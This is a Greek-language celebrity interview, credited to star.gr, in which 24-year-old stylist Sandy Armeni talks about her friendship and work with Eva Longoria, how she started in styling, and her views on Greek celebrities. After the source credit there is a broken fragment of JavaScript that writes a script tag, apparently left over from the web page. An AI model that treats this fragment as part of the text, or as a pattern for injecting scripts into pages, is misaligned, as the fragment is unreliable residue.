Μια 24χρονη Ελληνίδα στυλίστρια της Eva Longoria!

Σε ελληνικά χέρια εμπιστεύεται την εμφάνισή της η Eva Longoria, μία από τις πλέον καλοντυμένες του Hollywood: σε συνέντευξή της, η Σάντυ Αρμένη μιλά για την συνεργασία της με την ηθοποιό και αποκαλύπτει με ποιά εγχώρια επώνυμη θα ήθελε να συνεργαστεί.

«Με την Longoria γνωριστήκαμε τελείως τυχαία, στο δρόμο. Ήμουν σε μια καφετέρια, είχα βγει έξω να καπνίσω και ήρθε μόνη της και με ρώτησε “επιτρέπεται το κάπνισμα;”. Μετά της πρότεινα να έρθει να καθίσει μαζί μας κι έτσι ξεκίνησε η φιλία μας», δήλωσε η 24χρονη.
Μπορεί να σπούδασε διοίκηση επιχειρήσεων, αλλά το styling την κέρδισε: «ταξίδευα συχνά στη Νέα Υόρκη λόγω του ότι έκανα την παραγωγή για το GMtv, το ελληνοαμερικανικό μουσικό κανάλι. Σε ένα από τα ταξίδια μου γνώρισα την Πατρίσια Φιλντ κι εκείνη με παρότρυνε να ασχοληθώ με το styling. Το δοκίμασα και μου έκατσε, έτυχαν και κάποιες καλές δουλείες».

 

Εκτός από συνεργάτιδες, η Σάντυ και η Eva είναι φίλες. Όπως λέει η 24χρονη, η ηθοποιός είναι πολύ προσιτή και αληθινή και δεν έχει κόμπλεξ, ενώ «δεν θα την δεις ποτέ να κάνει τα δικά μας, ελληνικά “σταριλίκια”».
«Οι celebrities του Εξωτερικού είναι πράγματι γνωστοί, μην ξεχνάμε ότι έχουν κοινό σε παγκόσμιο επίπεδο. Οι δικοί μας είναι πρακτικά γνωστοί σε ένα εγχώριο σταρ σύστεμ που υτοτροφοδοτείται… Για μένα, celebrities στην Ελλάδα ήταν η Ειρήνη Παπά και η Μελίνα Μερκούρη», αναφέρει η στυλίστρια, προσθέτοντας πως η Μελίνα θα ήταν η Ελληνίδα την οποία θα ήθελε να γνωρίσει και να συνεργαστεί μαζί της.

 

«Δυστυχώς, ζούμε σε μία εποχή όπου ο καθένας φοράει ό,τι να ‘ναι, μιμείται όποιον θέλει και το βαφτίζει προσωπικό στυλ», καταλήγει η Σάντυ, χωρίς να απαντήσει σε ποια επώνυμη θα… περνούσε χειροπέδες αν ήταν fashion police!

 

Πηγή: star.gr
c=”‘+src+'”><\/script>‘)}

You may also like...

Leave a Reply